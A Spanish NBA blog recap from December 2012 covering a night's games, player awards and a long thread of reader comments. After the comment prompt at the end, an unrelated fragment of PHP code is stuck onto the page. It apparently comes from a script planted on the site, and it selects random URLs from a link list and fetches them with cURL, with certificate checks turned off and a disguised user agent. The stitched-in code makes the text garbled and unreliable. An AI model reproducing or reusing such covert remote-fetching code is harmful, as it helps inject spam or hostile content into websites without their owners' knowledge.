La Crónica: Redención

13 de December de 2012 por Simon

Jornada de miércoles con 13 partidos en la NBA que nos deja algunas canastas sobre la bocina, prórrogas y sorpresas, entre las que destacan el triplazo para ganar de Mo Williams y así redimirse de su fallo anterior, y, sobretodo, los 23.000 puntos que alcanzó Paul Pierce ayer. Solo 25 hombres han superado esa cifra. Toda una leyenda céltica Pierce.

“El que perdona lo acaba pagando” dice el dicho tan socorrido a menudo por entrenadores, periodistas y jugadores. A menudo es cierto, pero ayer no, al menos para los Boston Celtics de Doc Rivers, que perdonaron en dos ocasiones a Dallas pero al final se llevaron la victoria tras dos prórrogas. El partido tenía el morbo del enfrentamiento de Jason Terry ante su ex-equipo. En un partido que transcurrió siempre en el arco de los 5-8 puntos a favor de Boston, Dallas fue capaz de conseguir en el último cuarto igualar el partido con algunos tiros claves de Derek Fisher que sigue siendo el mismo de siempre con sus tiros decisivos. Rondo tuvo la última bola del tiempo regular pero como casi siempre en estas situaciones el bueno de Rajon dudó y acabo fallando el tiro decisivo. Al final de la primera prórroga y con empate en el marcador Paul Pierce tenía la bola para llevarse el partido pero una gran defensa de Dahntay Jones llevó el partido a la segunda prórroga donde Celtics, esta vez sí, consiguió imponer su juego y llevarse la victoria. Paul Pierce logró 34 puntos y Rajon Rondo se quedó solo a un rebote del triple doble tras 52 minutos de juego (16-15-9).  OJ Mayo anotó 24 puntos pero perdió 9 balones (115-117).

La peor racha perdedora y la segunda mejor racha ganadora de la liga, o lo que es lo mismo Charlotte y Clippers, se enfrentaron ayer en el Time Warner Cable Arena de Charlotte. El partido fue bastante entretenido y los Bobcats aguantaron muy bien a los Clippers durante todo el encuentro. El equipo de Griffin y Paul estuvo todo el tiempo por delante de Charlotte pero con ventajas que nunca superaron los 8 puntos. El factor diferencial fue, como casi siempre, el banquillo ‘clipper’ que consiguió 46 puntos y un acumulado de +29 a su favor por el + 1 que acumuló el quinteto titular, y todo esto a pesar de que el mejor sexto hombre de lo que va de regular season ayer no estuvo acertado. Fue Matt Barnes el que con 11 puntos en el último cuarto y un triple decisivo cuando más apretaban los Bobcats el que ató la octava victoria consecutiva para unos Clippers que están en un momento de juego exquisito. Griffin y Paul sumaron 19 puntos cada uno a los que el base añadió 10 asistencias. En los Bobcats el mejor fue Byron Mullens bien acompañado por Kemba Walker con 19 y 17 puntos respectivamente. Los Bobcats ya acumulan 9 derrotas consecutivas, no obstante, en este partido fueron competitivos y siempre estuvieron a la altura de uno de los mejores equipos de la liga (100-94). 

Otro equipo en gran forma son los Golden State Warriors que consiguieron su quinta victoria consecutiva en la casa del campeón en un partido igualadísimo  que terminó resolviendo uno de los jugadores que menos contaban para resolverlo. El rookie Draymond Green aprovechó un despiste de Shane Battier en su marca para convertir el pase de Jack en una canasta fácil a falta de 0’9 segundos. Como dato decir que Miami vencía de 4 puntos  a falta de más de 3 minutos pero ya no fue capaz de anotar el resto del partido. 4 triples fallados ( dos Allen, uno James y otro Battier ) y  2 pérdidas, Wade y Bosh, es el bagaje de los campeones en esos últimos 3 minutos de partido. El mejor jugador del partido fue Klay Thompson con 27 puntos 7 rebotes y 4 asistencias. David Lee acabó otro día en la oficina con 22 puntos a los que añadió 13 rebotes, mientras que Jack salió desde el banco para aportar 20 puntos y la asistencia ganadora. Por parte de los Heat, James y Bosh fueron los mejores con 31 y 21 puntos respectivamente. Mucho mérito tienen estos Warriors que sin el jugador que supuestamente les tenía que dar ese puntito para estar arriba en el fiero Oeste están consiguiendo estar precisamente ahí, en una cómoda quinta posición y de momento mas cerca de los súper gallos de la conferencia que del pelotón que lucha por un puesto de Play Off (97-95).

Oklahoma City Thunder tuvo que emplearse a fondo en la segunda parte de su encuentro ante New Orleans Hornets. Excesivamente relajados y sin chispa se les vio a los chicos de Oklahoma, como si solo con estar ahí el partido fuera a ganarse. Necesitaron de un invitado inesperado en el encuentro para poder ganar a los colistas del Oeste. Reggie Jackson aportó una gran intensidad defensiva y un par de canastas vitales que dieron esa chispa que no tenían ayer los líderes de la liga. Tras la remontada al final del tercer cuarto y principio del último y con Oklahoma por delante a falta de 9 minutos, el partido parecía estar encaminado a una victoria cómoda para Oklahoma pero New Orleans aguantó el tirón e incluso Vasquez tuvo tiro para forzar la prórroga. Durant acabó con 35 puntos por encima del 50% en tiros de campo.  Martin aportó 17 desde el banco y Westbrook algo fallón en el tiro aportó 14 puntos y 9 asistencias. Sin duda estamos viendo al mejor Westbrook de su carrera en este apartado.  El mejor de New Orleans fue un rookie pero no el número 1 del pasado draft Anthony Davis sino Brian Roberts con 16 puntos y 4 asistencias. 9 victorias seguidas para Oklahoma City Thunder que tendrá la oportunidad de llegar a 10 ante Sacramento en casa antes de recibir a los Spurs (88-92).

San Antonio cayó en uno de los pabellones más complicados de la actual temporada y probablemente la cancha más complicada en los últimos 20 años. Visitar Utah es casi siempre sinónimo de derrota para cualquier equipo.  El partido tuvo de todo: momentos igualados, rachas para ambos equipos, jugadas espectaculares, incluso una nueva clase magistral de Tim Duncan con 22 puntos y 21 rebotes más 6 tapones. A este partido le correspondía un final dramático y grandioso a la vez y así ocurrió. Como un guión de película fue el final para los Jazz cuyos aficionados veían que cada vez que parecía que San Antonio podía pegar un hachazo definitivo ocurría un milagro en forma de canastón o robo inesperado. Pero fue en los últimos 10 segundos en los que se vivieron las más contrapuestas  emociones, del odio y decepción a la absoluta veneración hacia Mo Williams. A falta de 9 segundos Mo Williams fallaba un triple que parecía dar la oportunidad a San Antonio Spurs de una última posesión para ganar el encuentro pero fue ahí cuando apareció Millsap en forma de ángel de la guarda para recoger el rebote y dar una oportunidad de redención a Mo, que esta vez sí y sobre la bocina anotó un gran triple en la cara de Danny Green que hizo explotar todo ese cúmulo de emociones que habían vivido los aficionados del Energy Solutions Arena. Millsap y Jefferson se combinaron para 45 puntos, 16 rebotes y 9 asistencias y ser el ancla de apoyo de los Jazz (96-99).

Chicago consiguió en Philadelphia una importantísima victoria ante un rival directo en la lucha por un buen puesto de cara a los Play Off en la conferencia Este.  El partido comenzó con los Sixers mandando con ligeras ventajas que Chicago dio la vuelta en el tercer cuarto para ponerse por encima con un 2+1 de Noah. El último cuarto transcurrió igualadísimo hasta  3 minutos del final en los que los Bulls consiguieron una ventaja de 5 o 6 puntos que fue definitiva. En los Bulls el mejor fue Noah con 21 puntos 7 rebotes y 5 asistencias bien acompañado con un doble doble de Luol Deng con 19 puntos y 12 rebotes. En Philadelphia el mejor fue como siempre Jrue Holiday con 26 puntos, 9 asistencias y 5 rebotes (96-89).

La mayor sorpresa de la noche, incluso más que la victoria Warriors, fue la derrota de Memphis Grizzlies en Phoenix. Memphis cayó en un horrendo partido en el que ambos equipos apenas superaron los 80 puntos. Al menos vimos un final igualado en el que Goran Dragic bailó en la última jugada a Marc Gasol para anotar el definitivo 82-80 y hacer saltar la sorpresa en el  Airways Center. El mejor “osito” fue Rudy Gay con 21 puntos y 11 rebotes junto con el clásico doble doble de Z-Bo.  En Phoenix 5 jugadores en dobles figuras en los que destacó como siempre Goran Dragic (80-82).

Brooklyn venció en Canadá apoyados en buenos partidos de Blatche y Johnson y una gran aportación del banquillo personalizada en Watson y Humphries al que parece que la suplencia le viene mejor que la titularidad. Por parte de Toronto partidazo de Ed Davis aprovechando su titularidad con 24 puntos y 12 rebotes con 11/13 en el tiro. Calderón salió también de titular y consiguió 10 puntos y 15 asistencias.  Calderón promedia 12 puntos y 12 asistencias cuando es titular (94-88).

Atlanta venció a Orlando para continuar sumando victorias que le mantienen en los puestos de honor de la conferencia Este. Apoyados como siempre en Smith y Horford no tuvieron problemas para vencer a unos Magic en los que el jugador más destacado fue Afflalo. Al final no iba tan desencaminada la ESPN al situarlos como segundos del Este. Actualmente están terceros y a un solo partido de los Heat (86-80).

Indiana ganó a Cleveland en un partido en el que lo más destacado fue el altercado que nos comentaba Sancho en un comentario de la crónica de ayer en el que Tyler Hansbrough se encaró con Thompson por “meterse” con su hermano pequeño  Ben. George y West estuvieron fantásticos. En Cleveland, partidazo de Miles y decepcionante 0/9 en tiros de Varejao (81-96).

Minnesota venció a Denver Nuggets a pesar del flojísimo partido del cuestionado Kevin Love, gracias a los grandes partidos de Kirilenko, Pekovic, Ridnour y Barea e incluso Cunnignham. En definitiva todos los wolves menos Love estuvieron a un gran nivel. En Denver, Gallinari jugó a un gran nivel y Faried se marcó unos números de escándalo pero el flojo partido de Iguodala y la escasa aportación, salvo en anotación, del banquillo los condenaron a volver a estar por debajo del  50% (105-108).

Finalmente, Milwaukee ganó cómodamente a unos Kings sin Cousins con un gran partido de Ilyasova (85-98) y Houston venció a los Wizards de la mano de Harden que en su vuelta cuajó un gran partido para guiar a su equipo a una nueva victoria (93-99).

PREMIOS

MVP: 9ª victoria de los Thunder con Kevin Durant tocando la guitarra. 35 puntos, 9 rebotes, 3 asistencias y 2 robos para el más firme candidato al MVP. Paul Millsap con 24 puntos (10 de 15) y 12 rebotes y Rajon Rondo con 16 puntos, 9 rebotes, 15 asistencias y 3 robos fueron los otros destacados del día.

Rookie: Bradley Beal le plantó cara a James Harden con 20 puntos, 4 rebotes, 6 asistencias y 2 robos. Buen partido de Jonas Valanciunas que anotó los 6 tiros que intentó y acabó con 15 puntos.

Sorpresa: Tras una serie de partidos más bien mediocres Nikola Pekovic explotó con 22 puntos y 11 rebotes, Gordon Hayward también fue clave en la victoria de su equipo con 19 puntos, 7 rebotes y 6 asistencias, pero la sorpresa del día es el buen partido de Emeka Okafor. Su equipo perdió pero el anotó 19 puntos y capturó 6 rebotes.

Decepción: Mala noche para los Cavs. Entre Anderson Varejao y Alonzo Gee fallaron 16 lanzamientos. Todos los que intentaron. El rookie Doron Lamb también falló sus 8 lanzamientos a canasta.

Esfuerzo en vano: Tim Duncan volvió loco a Al Jefferson con sus 22 puntos, 21 rebotes y 6 tapones pero la victoria cayó del lado de los Jazz. Los esfuerzos de Ed Davis (24 puntos con un 11 de 13 y 12 rebotes) y Kenneth Faried (26-14) tampoco se vieron recompensados.

Imágenes | AP Photos / Getty Images

Comenta

35 comentarios a esta entrada

  1. jose antonio ramirez dice:
    #1

    E-X-C-E-L-E-N-T-E cronica. Encima en miercoles, con tantos partidos no se como no te vuelves loco. Enhorabuena

      Citar

  2. Sancho88 dice:
    #2

    Simón, a sus pies. Enorme!!

      Citar

  3. Esteban dice:
    #3

    han prestado atencion al equipo con que los warriors vencieron a domiclio al heat, y con el que estan haciendo una campañon? la experiencia de lee, jack y landry, se le suman estos mimbres

    CURRY su carto año en liga
    THOMPSON su segunda temporada
    JENKIS, segundo año en liga
    BARNES, EZELI y GREEN, los 3 rookies

    tiembla el thunder como el equipo del futuro…

      Citar

  4. Vader dice:
    #4

    Gran trabajo de resumen, soy unos cracks!!!

    Por cierto ayer vi en diferido el Knicks – Nets y que gozada ver a Carmelo a este nivel. Es imparable, esta rapídisimo en el 1 contra 1. Grande Jason Kidd con 39 primaveras y como sigue mejorando su tiro de 3, que en sus años buenos no era ni mucho menos su mejor arma.

    Saludos

      Citar

  5. Ruxixón dice:
    #5

    Sorpresa de la jornada: Okafor.Jugando en Houston,lugar donde nació.Ya dijo que le motivaba mucho jugar en su casa.Puede volver a echar la siesta una temporadita no vaya ser que sude,vaya mangante Emeka.

      Citar

  6. Sancho88 dice:
    #6

    Oye, los eggs que le echa al asunto Dryamond Green son increíbles. Por talento, una chufa de tío, pero por huevos, está jugando todos los últimos cuartos, se permite encararse con Lebron y busca hasta bandejas ganadoras. Eso es creer en uno mismo, y esa es la clave de los Warriors, que creen en su talento y lo desarrollan. El triunvirato Lee-Thompson-Curry es una maravilla, de lo más entretenido de ver en toda la liga

      Citar

  7. Esteban dice:
    #7

    Sancho88:
    Oye, los eggs que le echa al asunto Dryamond Green son increíbles. Por talento, una chufa de tío, pero por huevos, está jugando todos los últimos cuartos, se permite encararse con Lebron y busca hasta bandejas ganadoras. Eso es creer en uno mismo, y esa es la clave de los Warriors, que creen en su talento y lo desarrollan. El triunvirato Lee-Thompson-Curry es una maravilla, de lo más entretenido de ver en toda la liga

    sancho88, es bueno leer viniendo de ti, cuando recuerdo perfectamente la acaolrada discucion que tuvimos, tu diciendo que los warriors debian seguir con monta, y yo diciendo que lo mejor que les podia ocurrir es que se marchara, venga quien venga

    no creo que haya muchos abucheos del estadio de golden state para su presidente al dia de hoy…

      Citar

  8. Sancho88 dice:
    #8

    pues no recuerdo aquella discusión Esteban… acaso, que yo dije que me parecía que podían haber sacado algo más por Ellis que Bogut… pero al margen de eso, tampoco soy yo un acérrimo defensor de Ellis, me parece un tipo con un talento impresionante pero con un sentido de juego en equipo inexistente. Y además, la marcha de Ellis era necesaria para darle el relevo a Klay Thompson. No sé, creo que se precipitaron con lo de Monta. Yo critiqué que el año pasado el equipo quedó deslabazado a mitad de temporada y tiraron el año por la borda, lo cual siempre me causa asco que hagan eso los equipos de abajo. El año pasado de los Warriors fue muy deficiente, lo que no quita que con Curry de vuelta, Thompson en 20 puntos por noche y Lee consolidado como uno de los diez mejores cuatros de la liga, el equipo obviamente aspiraba a Playoffs (como pronostiqué en mi análisis). Eso sí, yo creo que nadie nos los esperábamos tan arriba. El movimiento de fichar a Jack y Landry son geniales, pero siguen pagando la amnistía sobre un jugador que en Europa fue Dios por un año (Charly Bell), en vez de amnistiar a Biedrins. El puesto de cinco flojea, pero por el tipo de juego de los Warriors no importa mucho porque les gusta jugar small ball y todos a correr como locos. Dudo mucho incluso de que Bogut se adaptase a este eqiupo. Una pena lo de Bogut, quién entiende este tipo de casos? Se va disolviendo año tras año como un azurcarillo, y no hay que olvidar su número uno en el draft. Otro número uno maldito, lógicamente

      Citar

  9. Sancho88 dice:
    #9

    Por cierto, hablando de Klay Thompson. Si sigue en estos números, creeis que puede aspirar al MIP? Yo creo que sí eh? no empezó muy bien pero ya supera los 16 puntos por noche de media y va a más. Yo lo veo como un candidato

      Citar

  10. Esteban dice:
    #10

    thompson fuye muy criticado aca por un par de malos juegos, pero para mi es genial, tanto el como curry tienen algo que es una ventaja/desventaja

    no pinta para SUPERSTARS

    desventaja por que los pone un escalon por debajo del thunder

    pero ventaja por que por ende no cobrar el maximo, por lo que podran quedarse, curry, thompson, barnes y lee por unos cuantos años mas, en cambio el thunde rtuvo que desenderse de harden y los contratos super altos de durnat, westbrook e ibaka dejan con muy poco margen de maniobra

    PD: sancho opino lo mismo, no se entiende como los directivos de los warriors siguen confiando en que le sacaran algo a biedrins,

      Citar

  11. rumbero dice:
    #11

    Lo más flipante de los Warriors es que siempre se les ha tirado en cara las lagunas que tienen en la pintura y hasta el momento estan jugando más small ball que nunca con unas minutadas tremendas del trio Curry-Jack-Thompson y Lee de hombre grande y estan ganando la tira de partidos.

    Sancho88:
    Por cierto, hablando de Klay Thompson. Si sigue en estos números, creeis que puede aspirar al MIP? Yo creo que sí eh? no empezó muy bien pero ya supera los 16 puntos por noche de media y va a más. Yo lo veo como un candidato

    Yo creo que con el cambio d aires de Harden y Mayo lo va a tener complicado. Además estan por ahi nombres como Batum o Turner que deben andar con una progresión similar, pero vaya, que pasada la pájara que tuvo y a este nivel puede andar cerquita

      Citar

  12. Denise dice:
    #12

    Sancho88: Dudo mucho incluso de que Bogut se adaptase a este eqiupo. Una pena lo de Bogut, quién entiende este tipo de casos? Se va disolviendo año tras año como un azurcarillo, y no hay que olvidar su número uno en el draft. Otro número uno maldito, lógicamente

    Hubo una vez alguien que dijo en el blog que Bogut era mejor pivot de la NBA, por delante de Howard, Pau, Duncan…
    Yo también creo que Bogut no pega para los GSW, y lo siento pero creo que está acabado para ser un jugador franquicia , y el resto de su carrera se la pasará cobrando la millonada de 12-13 klos al año para jugar 30 partidos al año y promediar un 12-7.
    Lo mejor que le puede pasar a GSW es traspasarlo en el momento en que consiga enlazar 3 partidos consecutivos buenos.

      Citar

  13. Ruxixón dice:
    #13

    Por cierto,hoy Lakers @ Knicks.¿El Madison con Carmelo a la cabeza homenajeará a D’Antoni por esos años tan maravillosos?Me late que habrá sorpresa y que ganan los Lakers -no quiero,pero me pide el cuerpo marcha-.

      Citar

  14. melo15 dice:
    #14

    Esteban no entiendo porque siempre intentas ridiculizar o reinvindicarte por encima de los demas, recordando cuando y en que se equivocaron. Porque no dices solo lo que piensas y ya esta.
    Ess como si yo ahora empezara: Os habeis equivocado todos en el analisis de los Knicks diciendo que eran unos viejos y que no iban a liderar la Conferencia Este.

      Citar

  15. txusma dice:
    #15

    melo15:
    Ess como si yo ahora empezara: Os habeisequivocado todos en el analisis de los Knicks diciendo que eran unos viejos y que no iban a liderar la Conferencia Este.

    Ahí lo dejas… Grande melo! 😀

      Citar

  16. Sancho88 dice:
    #16

    Jjeeje, ni Turner, ni Batum, ni Thompson, el MIP para Melo después del ROY del año pasado. jejeje

      Citar

  17. TheDeerHunter dice:
    #17

    Denise: Hubo una vez alguien que dijo en el blog que Bogut era mejor pivot de la NBA, por delante de Howard, Pau, Duncan…

    Dicen que si lo mencionas tres veces vuelve a aparecer al instante…

      Citar

  18. Chipi dice:
    #18

    Pues yo no sé vosotros, pero yo tengo unas ganas de ver a Faried en el All Star……

      Citar

  19. rumbero dice:
    #19

    Gritos de melo MVP en las gradas de tjnba

      Citar

  20. Esteban dice:
    #20

    Solo recuerdo aquello por que tuve una dura discusion por ese tema con sancho88 icnluso me acuso de saber lo q piensan los hinchas de los warriors, de hecho fue algo ironico de su parte

    PD: yo nunca dude de los knicks, puedes mirar mis comentarios en el analisis

      Citar

  21. Denise dice:
    #21

    Ruxixón:
    Por cierto,hoy Lakers @ Knicks.¿El Madison con Carmelo a la cabeza homenajeará a D’Antoni por esos años tan maravillosos?Me late que habrá sorpresa y que ganan los Lakers -no quiero,pero me pide el cuerpo marcha-.

    Yo tambien profetizo una victoria de Lakers esta noche. Siempre que un equipo grande está en su peor momento y tienen que enfrentarse a un equipo en racha de victorias, el grande acaba sacando la casta y el orgullo para pegar un puñetazo en la mesa y ganar el partido.

      Citar

  22. Esteban dice:
    #22

    Una voctoria de los lakers si que seria un sorpreson, aunque pasa cada tanto NBA, en argentina va en directo, iupi

      Citar

  23. Esteban dice:
    #23

    Alguien tiene alguna idea cierta si va a volver bogut esta temporada? Pedazo de equipo pueden ser los warriors

      Citar

  24. Txusma dice:
    #24

    Chipi:
    Pues yo no sé vosotros, pero yo tengo unas ganas de ver a Faried en el All Star……

    Faried se lo pasaría bien en el All Stars pero ha de mejorar bastante para tener una larga carrera en la NBA. Ahora mismo es un 0 a la izquierda en cuanto a defensa individual se refiere y en ataque estático aporta más bien poco. De momento eso lo suple con muchas ganas, un hambre voraz y un físico privilegiado pero no tengo claro si ahora mismo es más parte del problema de los Nuggets que de la solución.
    Creo que les falta una referencia interior válida como el comer. Ni Faried, ni McGee, ni Koufos lo son. Cada uno tiene sus cosas buenas pero ninguna de ellos es un buen jugador en el poste en un uno contra uno. Creo q eso permite a los equipos concentrarse mucho en los exteriores.
    Y bueno, luego está lo de la incompatibilidad entre Iguodala y Lawson…

      Citar

  25. Chipi dice:
    #25

    No me refiero a temas baloncestísticos, txusma, sino en cómo está montado el tinglado del All Star game. Por supuesto que Faried no tiene aún nivel de superestrella NBA, pero en un partido así tiene que ser un espectáculo.

      Citar

  26. Viva_Dirk dice:
    #26

    Parece que cada jugador bueno que se le junta es imcompatible con Iguodala.

      Citar

  27. R1Molano dice:
    #27

    Vaya nivelon que llevamos. Curry excelente jugando de PG muy firme, tener a Jack (hay que hacerle vitalicio ya) le da mucha tranquilidad y le permite jugar fuera de balón en los finales.

    Yo creo que Bogut se va a adaptar bien, que ademas es un C que corre la pista excelentemente eh!. Nosotros hasta hace unos partidos que hemos empezado a estar muy fluidos hemos jugado lento, llevamos corriendo estos días, también tendrá que ver que los rivales del este suelen ser de juego mas lento. Bogut tiene un IQ enorme, se va a llevar bien con Lee y Curry. Ya jugo muy bien limitado a principio de temporada.

    Jackson sobre Green: “hace todas las cosas bien, pero no hace nada excelentemente”. “Es un líder, aun siendo rookie” Corazón, gran entendimiento del juego, lucha y en ataque no es nada manco, tira de 3, muy buen pase y entendimiento del pick&roll… es un tío que sin ser una maravilla juega una carrera entera en un equipo y le retiran el numero.

    16 de los últimos 21 partidos en el Oracle para GSW.

    Perdonad por el spam pero en los comentarios lo han pedido, en su día escribí este post sobre todo lo de Bogut. Esta documentado, no es una marcada ni una fanaticada:
    http://losgswarriors.blogspot.com.es/2012/12/que-pasa-con-el-tobillo-de-bogut.html

      Citar

  28. yuntas dice:
    #28

    Pues yo creo igual que el amigo fan de GSW. No den por muerto a Bogut y es mas es una gran pivot y de los mejores en defensa por lejos, el que tiene mejores conceptos en el juego defensivo. Es después de Marc Gasol el pivot con mas IQ de la liga, menos pasador pero puede anotas mas y defiende mejor. Tampoco creo que no pueda correr la cancha, lo hace muy bien, no es nada lento y corre.
    No creo que a ningún equipo le pueda venir mal tener a Bogut por falta de química ¿Que es eso? De pronto muchos equipos llenos de talento con problemas, pero los buenos jugadores siempre pueden jugar juntos, otra cosa es la actitud y otra es que parecen grandes jugadores pero con un millon de condiciones a darse para que lo sean. Andrew lucha debajo del aro, tira de cerca, es gran defensor y por eso se complementaria excelentemente con Lee. Como en ataque no es ningun manco y sabe interpretar el pick and roll (en los Buck jugo sin un base estable mucho tiempo) andaría muy bien con Curry y Jack. Ademas va con el perfil del equipo. Es un Center que crea sus propios tiros.
    Tampoco es que vaya con esto GSW a ser finalista de la NBA, ni asegurado los PO pero lo estan haciendo bien y además tienen a Barnes que pinta para crack, un quinteto con 3 excelente, un Thompson que hay que ver y un proyecto de crack mas Landry y Jack deberia confirmarse sino sera una mala noticia para todos los que vemos la NBA.

      Citar

  29. Esteban dice:
    #29

    lo dije el otro dia

    en su momento le toco a zach la reinvindicacion
    el año pasado a jefferson

    este año se la lleva david lee, demostrando que no es un hace numeros, incluso hasta puede ser all-star

    otro que goza de un rol definido en un buen conjunto y vaya si lo hace bien es andrew blatche

      Citar

  30. simon dice:
    #30

    Madremia vaya partido se ha cascao lillard de momento a falta de un minuto 29-6-6 ante spurs que se van a llevar los trail blazers… y Batum que no ha estado fino en toda la noche pero ha anotado un triple que los ponia 6 arriba a falta de un minuto y a la siguiente jugada ha conseguido un robo fundamental. Jugón!
    Claver otra vez titular 0/4 en tiros y 2 robos y 1 perdida en 12 minutos. Cuando vuelva Mathews volverá a la D-League o a ni jugar un minuto. Q este saliendo en el quinteto no es mas que no querer romper la segunda unidad ( que por otra parte la de Portland es mala mala… )

      Citar

  31. Denise dice:
    #31

    simon:
    Madremia vaya partido se ha cascao lillard de momento a falta de un minuto 29-6-6 ante spurs que se van a llevar los trail blazers… y Batum que no ha estado fino en toda la noche pero ha anotado un triple que los ponia 6 arriba a falta de un minuto y a la siguiente jugada ha conseguido un robo fundamental. Jugón!
    Claver otra vez titular 0/4 en tiros y 2 robos y 1 perdida en 12 minutos. Cuando vuelva Mathews volverá a la D-League o a ni jugar un minuto. Q este saliendo en el quinteto no es mas que no querer romper la segunda unidad ( que por otra parte la de Portland es mala mala… )

    Claver es el talisman del equipo, …o eso dicen algunos…xD

      Citar

  32. txusma dice:
    #32

    Viva_Dirk:
    Parece que cada jugador bueno que se le junta es imcompatible con Iguodala.

    Más que jugador bueno, todo base que se le junta, cosa que no quiere decir que sea culpa ni del uno ni del otro. Iguodala me recuerda a Turkoglu en el sentido de ser un F que necesita el balón y ordena el juego. Si en tu equipo tienes a un base que hace lo mismo, la cosa no funciona. Es como los famosos triángulos de Phil Jackson, allí no hacía falta base y los Lakers nunca incorporaron a un base de calidad.

      Citar

  33. TheDeerHunter dice:
    #33

    txusma: Más que jugador bueno, todo base que se le junta, cosa que no quiere decir que sea culpa ni del uno ni del otro. Iguodala me recuerda a Turkoglu en el sentido de ser un F que necesita el balón y ordena el juego. Si en tu equipo tienes a un base que hace lo mismo, la cosa no funciona. Es como los famosos triángulos de Phil Jackson, allí no hacía falta base y los Lakers nunca incorporaron a un base de calidad.

    Querrás decir un base distribuidor de calidad… a ver si voy a sacar el cinto.

      Citar

  34. nba dice:
    #34

    Me da a mi que en la cancha de entrenamientos de Lakers, “El Segundo”, en vez de tener colgados las victorias como campeones de division/conferencia/etc, deberian colgar una megapancarta que pusiese “DE-FEN-SE”
    Alguien deberia explicar a D’antoni y sus chicos en que consiste la defensa del perimetro

      Citar

  35. Txusma dice:
    #35

    TheDeerHunter: Querrás decir un base distribuidor de calidad… a ver si voy a sacar el cinto.

    😀 Nada más lejos de mis intenciones ofender al gran Derek Fisher.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>